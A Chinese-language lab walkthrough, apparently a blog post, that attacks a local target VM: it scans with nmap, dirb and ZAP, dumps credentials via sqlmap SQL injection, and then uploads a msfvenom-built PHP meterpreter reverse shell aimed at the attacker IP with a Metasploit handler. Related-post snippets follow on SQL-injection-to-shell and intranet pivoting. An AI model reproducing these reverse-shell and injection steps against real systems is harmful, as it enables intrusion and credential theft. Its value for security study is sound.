攻擊機ip:192.168.1.3
靶機ip:192.168.1.6
首先,我們使用dirb命令和nmap進行掃瞄發現了以該ip為url的**
仔細搜尋該頁面發現個admin欄,點選發現了乙個登陸頁面
然後我們使用owasp-zap掃瞄器掃瞄該**
那麼我們開始掃瞄這個**吧!
發現如下漏洞
既然存在sql注入漏洞,那麼我們就可以利用該漏洞進入資料庫拿使用者名稱和密碼了,使用sqlmap進行爆破!得到使用者名稱和密碼如下
password下面那個長長的字串時密碼的雜湊值,將其解碼就得到了後面那個密碼
那麼我們就可以使用這個賬號和密碼進行登陸伺服器了!
然後發現了一串文字,說上傳,那就以為著還存在檔案上傳漏洞!那我們試試能不能讓伺服器自己**個shell回顯到kali終端。不過在這之前我們先要啟動監聽。
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻擊機ip位址
然後我們在製作乙個木馬
我們可以利用metasploit生成shell,命令如下:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 -f raw > /root/desktop/shell.php 然後就會在桌面生成乙個名為shell.php的shell,然後在上傳到服務即可
但是我們發現它對上傳的檔案的字尾名進行了驗證,必須是.php才可以上傳
既然如此,那我們就把shell的字尾名改成php就行了。上傳成功後,點選該檔案,執行檔案。
但是此時來問題了,終端給我回顯了個這個
不知道為啥是從本地**shell給了本地???這咋整?有知道的師傅給支個兒招嗎?
從SQL注入到getshell
mysql資料庫getshell條件是很苛刻的,必須滿足以下幾個條件 1 必須知道 的絕對路徑 2 要有file許可權,預設情況下只有root有,也就是dba為true 3 php的魔術引號 magic quotes gpc 沒有開啟 4 mysql的secure file priv變數的值為空 e...
從SQL注入到內網漫遊
在一次滲透實戰中,發現了乙個注入點,最後成功的漫遊了內網。在滲透中遇到乙個站點,順手測試了一下,在搜尋框隨便輸入了乙個字元加個單引號直接報錯了,差不多可以確認這裡存在注入了。一般這種站安全性極差,測試了下其他地方,在乙個登入框處又發現乙個注入。直接丟到sqlmap裡面跑就行了。這裡就不重新跑了,貼s...
遠端從伺服器A拷貝檔案到伺服器B
1.遠端從伺服器a拷貝檔案到伺服器b 命令 scp r 要拷貝的檔案目錄 root 目標伺服器ip 拷貝之後存放目錄 scp r docker demo.tar root 192.168.243.129 usr local 然後根據提示輸入伺服器密碼即可進行複製。意思 把192.168.243.12...